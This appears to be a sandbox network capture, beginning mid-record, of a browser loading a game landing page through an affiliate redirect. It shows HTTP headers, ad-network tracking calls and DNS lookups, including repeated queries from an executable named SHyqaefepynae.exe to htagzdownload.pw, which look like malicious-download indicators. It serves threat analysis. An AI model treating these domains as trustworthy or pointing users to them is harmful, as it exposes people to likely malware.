user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: application/javascript
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: W/"5f5657da-80e"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
cf-request-id: 09df32e3b600004c5c7a3c3000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=rV3xEmsvMr83RdlXGyq2bMBi6EDEv6dQJf%2BHFXb934Ksw%2B%2F7GhzsoU7y5HXvcVPv54r7pYOON6OV15d1zZEVh1C1bVlNBCDwKyyjTk6zee%2Bf"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ef94c5c-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/g1.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/g1.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 2699
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-a8b"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4792
accept-ranges: bytes
cf-request-id: 09df32e3b100004c5c442ae000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4p4GLj6AGvD9xA2ytP28CzK6qpI3pcfYFPgHWjtn8cjSoq1HkhxE4ABeFfhdWZinVssJYDzfq4pFrOUsY96QjYtU4ESSFu7te%2FmB6PBF8Ntp"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ecf4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/g3.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/g3.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 8136
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-1fc8"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b400004c5c86a21000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Z9mZQuj1YhTODd4JtjscaaAbu6yMJ8dJ%2BV3Z04X9ccNG9dw5N9IONIDh3TUd09jcZExXqe9wFsnLaUWjNggm96lI3MB%2BDo9W2s9gyJotec4F"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ee64c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/pbar.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/pbar.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 8673
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-21e1"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b600004c5c7f3eb000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=o9zQ%2BhVmvb9hCxaLaQyTMVIZ3H7Zf5W4YgAy5Gszgdo6EdS0Y0cFUSh4SIAEctI%2F9yz0assjvBF89GdrwAyKl1cJZZtey7yIeJktEqZ4rbrM"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8edc4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/scripts/main.js

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/scripts/main.js HTTP/2.0
host: theonlygames.com
accept: application/javascript, */*;q=0.8
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 73328
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-11e70"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4793
accept-ranges: bytes
cf-request-id: 09df32e3b800004c5ca60c8000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tKrT0%2F3nfJg24LdbB%2BWSPS29VauPyXCUXdmvL1IRrBxOUUr%2Fl6TJPzkTLKes%2FkJRwaqMSB%2FN%2FgHCda41dotcZqjz5lffB4rWhpB4JBVwVF%2BR"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f7ec44c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/fonts/main.woff2

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/fonts/main.woff2 HTTP/2.0
host: theonlygames.com
accept: */*
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://theonlygames.com
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:36:00 GMT
content-type: application/octet-stream
content-length: 9132
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-23ac"
access-control-allow-origin: *
cache-control: max-age=14400
cf-cache-status: HIT
age: 7126
accept-ranges: bytes
cf-request-id: 09df32e4e800004c5c852f8000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TiukycWde86V9PrBPIDc9CwfjDhZ%2FMgi2FSUj5RphzNIq3u24Xix8jABY5alzAiU4DlZX2B6WeEJfh9Byx8ds281%2B0inO3JlSBMYOdQ33Qcv"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba817d0f4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/bg.jpg

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/bg.jpg HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:36:01 GMT
content-type: image/jpeg
content-length: 170610
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-29a72"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4741
accept-ranges: bytes
cf-request-id: 09df32eaab00004c5c3a15b000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4zAn%2FQWDqfbKB4J0WO4W9UKd5tKYvf%2BAUnlWlrTthNzF3WgAzdVcmVa2GGWGNjBegybhpDDMofnV4soF2vbs%2BFzHGNuXAaIofA5jmhxgP4mT"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba8aaedb4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

ln.gamesrevenue.com

Remote address:

8.8.8.8:53

Request

ln.gamesrevenue.com

IN A

Response

ln.gamesrevenue.com

IN A

204.155.147.176
GET

https://ln.gamesrevenue.com/px1.js

MicrosoftEdgeCP.exe

Remote address:

204.155.147.176:443

Request

GET /px1.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: ln.gamesrevenue.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:00 GMT
Content-Type: application/javascript
Last-Modified: Thu, 18 Mar 2021 15:19:11 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"60536f6f-38f0"
Content-Encoding: gzip
DNS

nextgencounter.com

Remote address:

8.8.8.8:53

Request

nextgencounter.com

IN A

Response

nextgencounter.com

IN A

104.21.61.108

nextgencounter.com

IN A

172.67.209.21
DNS

nextgencounter.com

Remote address:

8.8.8.8:53

Request

nextgencounter.com

IN A

Response

nextgencounter.com

IN A

172.67.209.21

nextgencounter.com

IN A

104.21.61.108
DNS

main.exdynsrv.com

Remote address:

8.8.8.8:53

Request

main.exdynsrv.com

IN A

Response

main.exdynsrv.com

IN CNAME

syndication.exdynsrv.com

syndication.exdynsrv.com

IN CNAME

tk6if76q.ab1n.net

tk6if76q.ab1n.net

IN A

95.211.229.246

tk6if76q.ab1n.net

IN A

95.211.229.245
DNS

my.rtmark.net

Remote address:

8.8.8.8:53

Request

my.rtmark.net

IN A

Response

my.rtmark.net

IN A

139.45.195.8
DNS

my.rtmark.net

Remote address:

8.8.8.8:53

Request

my.rtmark.net

IN A

Response

my.rtmark.net

IN A

139.45.195.8
GET

https://main.exdynsrv.com/tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e

MicrosoftEdgeCP.exe

Remote address:

95.211.229.246:443

Request

GET /tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.exdynsrv.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.exdynsrv.com;
Content-Encoding: gzip
GET

https://main.exdynsrv.com/tag.php?goal=315a7277b250d14fa10b881aa0e2bda6

MicrosoftEdgeCP.exe

Remote address:

95.211.229.246:443

Request

GET /tag.php?goal=315a7277b250d14fa10b881aa0e2bda6 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.exdynsrv.com
Connection: Keep-Alive
Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A2%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7Di%3A85836%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.exdynsrv.com;
Content-Encoding: gzip
GET

https://nextgencounter.com/index.min.js?pk=28407dccfb372e83ee9d49a69f097187

MicrosoftEdgeCP.exe

Remote address:

104.21.61.108:443

Request

GET /index.min.js?pk=28407dccfb372e83ee9d49a69f097187 HTTP/2.0
host: nextgencounter.com
accept: application/javascript, */*;q=0.8
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:36:01 GMT
content-type: application/javascript
set-cookie: __cfduid=d8571ce673d536ecb5d08936c88e8d1c91620236161; expires=Fri, 04-Jun-21 17:36:01 GMT; path=/; domain=.nextgencounter.com; HttpOnly; SameSite=Lax
last-modified: Fri, 19 Mar 2021 11:14:58 GMT
etag: W/"605487b2-285"
cache-control: max-age=14400
cf-cache-status: HIT
age: 1035
cf-request-id: 09df32e83c000000fce6aab000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GU13O8tOQt2rweXhc8ZhO7%2BiZSfx3v7juUdJLKbUwxCg%2BizwdtILZFAll6pcyEhqj4qFFtZnP5%2BnDJGwcPQLswPkNh%2BY5odnqkZ4xyFPmAycvlY%3D"}]}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba86cc7d00fc-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://my.rtmark.net/img.gif?f=sync&lr=1&partner=4525db4116ed1c87c5ad9a1c2cb785cedc7f7ec9dfd0157a058f115a95fabcf3

MicrosoftEdgeCP.exe

Remote address:

139.45.195.8:443

Request

GET /img.gif?f=sync&lr=1&partner=4525db4116ed1c87c5ad9a1c2cb785cedc7f7ec9dfd0157a058f115a95fabcf3 HTTP/2.0
host: my.rtmark.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

server: nginx
date: Wed, 05 May 2021 17:36:01 GMT
content-type: image/gif
content-length: 43
access-control-allow-origin: *
access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
access-control-expose-headers: Authorization
access-control-allow-credentials: true
timing-allow-origin: *
set-cookie: ID=b931a51aa7284037a4465160de290faa; expires=Thu, 05 May 2022 17:36:01 GMT; secure; SameSite=None
strict-transport-security: max-age=1
x-content-type-options: nosniff
timing-allow-origin: *
DNS

main.exoclick.com

Remote address:

8.8.8.8:53

Request

main.exoclick.com

IN A

Response

main.exoclick.com

IN CNAME

syndication.exoclick.com

syndication.exoclick.com

IN CNAME

tk6if76q.ab1n.net

tk6if76q.ab1n.net

IN A

95.211.229.245

tk6if76q.ab1n.net

IN A

95.211.229.247
GET

https://main.exoclick.com/tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e

MicrosoftEdgeCP.exe

Remote address:

95.211.229.245:443

Request

GET /tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.exoclick.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.exoclick.com;
Content-Encoding: gzip
GET

https://main.exoclick.com/tag.php?goal=315a7277b250d14fa10b881aa0e2bda6

MicrosoftEdgeCP.exe

Remote address:

95.211.229.245:443

Request

GET /tag.php?goal=315a7277b250d14fa10b881aa0e2bda6 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.exoclick.com
Connection: Keep-Alive
Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A2%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7Di%3A85836%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.exoclick.com;
Content-Encoding: gzip
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

main.realsrv.com

Remote address:

8.8.8.8:53

Request

main.realsrv.com

IN A

Response

main.realsrv.com

IN CNAME

tk6if76q.ab1n.net

tk6if76q.ab1n.net

IN A

95.211.229.246

tk6if76q.ab1n.net

IN A

95.211.229.247
GET

https://main.realsrv.com/tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e

MicrosoftEdgeCP.exe

Remote address:

95.211.229.246:443

Request

GET /tag.php?goal=7ac151cecb6d5053d7cf4c7fa1ac596e HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.realsrv.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.realsrv.com;
Content-Encoding: gzip
GET

https://main.realsrv.com/tag.php?goal=315a7277b250d14fa10b881aa0e2bda6

MicrosoftEdgeCP.exe

Remote address:

95.211.229.246:443

Request

GET /tag.php?goal=315a7277b250d14fa10b881aa0e2bda6 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: main.realsrv.com
Connection: Keep-Alive
Cookie: goals=a%3A1%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: goals=a%3A2%3A%7Bi%3A85830%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7Di%3A85836%3Ba%3A1%3A%7Bs%3A4%3A%22date%22%3Bs%3A10%3A%222021-05-05%22%3B%7D%7D; expires=Thu, 05 May 2022 17:36:01 GMT; path=/; domain=.realsrv.com;
Content-Encoding: gzip
DNS

mc.yandex.ru

Remote address:

8.8.8.8:53

Request

mc.yandex.ru

IN A

Response

mc.yandex.ru

IN A

77.88.21.119

mc.yandex.ru

IN A

87.250.251.119

mc.yandex.ru

IN A

87.250.250.119

mc.yandex.ru

IN A

93.158.134.119
GET

https://mc.yandex.ru/metrika/tag.js

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Request

GET /metrika/tag.js HTTP/2.0
host: mc.yandex.ru
accept: application/javascript, */*;q=0.8
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-length: 69744
date: Wed, 05 May 2021 17:36:02 GMT
access-control-allow-origin: *
etag: "608a5251-11070"
expires: Wed, 05 May 2021 18:36:02 GMT
last-modified: Fri, 30 Apr 2021 17:14:07 GMT
cache-control: max-age=3600
content-encoding: br
content-type: application/javascript
strict-transport-security: max-age=31536000
DNS

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Response

HTTP/2.0 302

